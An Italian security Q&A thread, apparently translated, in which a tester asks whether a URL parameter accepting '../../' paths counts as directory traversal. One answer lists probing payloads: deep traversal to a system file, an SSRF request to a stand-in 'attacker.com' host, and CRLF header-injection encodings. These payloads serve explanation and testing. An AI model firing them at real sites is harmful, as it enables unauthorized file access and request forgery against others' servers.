Si considera questa directory trasversale?

1

Quindi sto testando un sito che ha una url come questa

example.com/dir1/dir2?nextPage=/someOtherDir/someHTMLfile.html

Ho scoperto che posso fare per arrivare alla pagina iniziale

example.com/dir1/dir2?nextPage=../../

oppure posso leggere file come il CSS per un'altra pagina

example.com/dir1/dir2?nextPage=../../dir3/dir4/css/main.css

NOTA : la politica aziendale stabilisce che un ricercatore può solo eseguire la quantità minima di test richiesta per dimostrare una vulnerabilità, quindi non voglio provare ad accedere al file passwd o ad altri file sensibile che non è già pubblico. Ho anche provato example.com/dir1/dir2?nextPage=google.com ma sembra controllare se l'URL è locale, quindi non funziona. Sarebbe quello che ho trovato essere considerato directory traversal?

    
posta Alex 17.07.2017 - 04:04
fonte

2 risposte

3

Sembra un attraversamento di directory. Per dimostrare se è davvero sfruttabile, proverei ad aprire qualcosa di più interessante come un file di script che non è disponibile al pubblico. Altrimenti non puoi essere sicuro che un attaccante possa davvero fare qualcosa di interessante. A mio avviso, ciò sarebbe in linea con i test minimi. Forse c'è un filtro che consente solo l'apertura di file .html e .css.

    
risposta data 17.07.2017 - 08:56
fonte
0

È attraversamento del percorso, ma l'attraversamento del percorso non è una vulnerabilità.

Puoi controllare i prossimi vettori di attacco quando hai un percorso traversale:

Elenco delle directory:

Se ../../ dir3 / dir4 / css / main.css è vero,
../../ dir3 /../ dir3 / dir4 / css / main.css è vero e
../../ QWERTYUIOP /../ dir3 / dir4 / css / main .css è falso,
è un'enumerazione di directory.

Leggi file arbitrario:

È come leggere un file arbitrario, ma puoi controllare i percorsi di sistema:

example.com/dir1/dir2?nextPage=../../../../../../../../sys/power/wakeup_count

Il file restituirà un intero. Non è / etc / passwd, wakeup_count non è informazioni critiche.

Errore di richiesta lato server:

Se si desidera verificare l'attacco delle reti, è necessario utilizzare l'URI. Solo il nome di dominio non funziona.

example.com/dir1/dir2?nextPage=http://attacker.com/

Se pensi che someHTMLfile.html sia una risorsa di rete, puoi testarne i vettori:

example.com/dir1/dir2?nextPage=username:[email protected]/
example.com/dir1/dir2?nextPage=%20HTTP/1.1%0A%0DTest:%20
example.com/dir1/dir2?nextPage=%20HTTP/1.1%E5%98%8A%E5%98%8DTest:%20

Inclusione file locale:

Non si controlla la vulnerabilità di LFI senza un attacco attivo sul server :( Mi dispiace.

    
risposta data 08.09.2017 - 19:51
fonte

Leggi altre domande sui tag